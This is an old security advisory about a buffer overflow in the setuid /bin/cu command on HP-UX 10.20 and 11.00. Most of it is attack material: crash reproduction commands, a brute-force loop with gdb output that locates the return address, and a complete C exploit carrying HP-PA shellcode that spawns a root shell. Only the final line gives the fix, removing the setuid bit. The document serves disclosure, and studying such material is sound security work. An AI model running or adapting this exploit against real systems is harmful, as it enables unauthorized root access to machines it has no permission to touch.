COMMAND

    cu

SYSTEMS AFFECTED

    HpUX 10.20, 11.00

PROBLEM

    'zorgon' found following (tested on HP-UX B.11.00).

        $ ls -la `which cu`
        -r-sr-xr-x   1 bin          40960  9 avr  1998 /bin/cu

    Using '-l' with a long option string:

        $ cu -l `perl -e 'printf "A" x 9777'`
        La connexion a  chou     : Requested device/system name not known

        $ cu -l `perl -e 'printf "A" x 9778'`
        Memory fault

    It's exploitable on 10.20 (trivial exploit: you don't even have to
    find return address, the buffer itself gets executed).  HP-UX  9.x
    68k seems to be vulnerable too.  On HP-UX 11 you need PA-RISC  1.1
    shell code, and the PC you get with

        ./cu -l `perl -e 'printf "A" x 5667'`

    changes randomly  (why?).   Eventually you  get a  pointer to your
    data:

        $ while :
        do
        ./cu -l `perl -e 'printf "A" x 5667'`
        if file core | egrep -v SIGILL
        then
            break
        fi
        done

        [...]
        Illegal instruction(coredump)
        Connect failed: Requested device/system name not known

        Illegal instruction(coredump)
        Memory fault(coredump)
        core:           core file from 'cu' - received SIGSEGV


        $  gdb cu core
        [...]
        Core was generated by `cu'.
        Program terminated with signal 11, Segmentation fault.
        Unable to find __dld_flags symbol in object file.

        #0  0x7f7eb010 in ?? ()
        #0  0x7f7eb010 in ?? ()
        (gdb) print {char *} 0x7f7eb010
        $1 = 0x41414141 <Address 0x41414141 out of bounds>
        (gdb)

    zorgon has written an exploit for the HP/UX /bin/cu command:

    /* Copyright (c) 2001 Zorgon
     * All Rights Reserved
     * The copyright notice above does not evidence any
     * actual or intended publication of such source code.
     *
     * HP-UX /bin/cu exploit.
     * Tested on HP-UX 11.00
     * zorgon@antionline.org (http://www.nightbird.free.fr)
     *
     */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>
    
    #define LEN 9778
    #define HPPA_NOP 0x0b390280
    #define RET 0x7f7eb010
    #define OFFSET 1200    /* it works for me */
    
    u_char hppa_shellcode[] = /* K2 <ktwo@ktwo.ca> shellcode */
    "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
    "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
    "\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";
    
    int
    main(int argc , char **argv){
            char buffer[LEN+8];
            int i;
            long retaddr = RET;
            int offset = OFFSET;
    
            if(argc>1) offset = atoi(argv[1]);
            for (i=0;i<LEN;i+=4)
                    *(long *)&buffer[i] = retaddr + offset;
    
            for (i=0;i<(LEN-strlen(hppa_shellcode)-50);i++)
                    *(buffer+i) = HPPA_NOP;
    
            memcpy(buffer+i,hppa_shellcode,strlen(hppa_shellcode));
            fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n");
            fprintf(stderr, "Copyright (c) 2001 Zorgon\n");
            fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer));
    
            execl("/bin/cu","cu","-l",buffer,0);
    }

SOLUTION

    Fix: chmod -s /bin/cu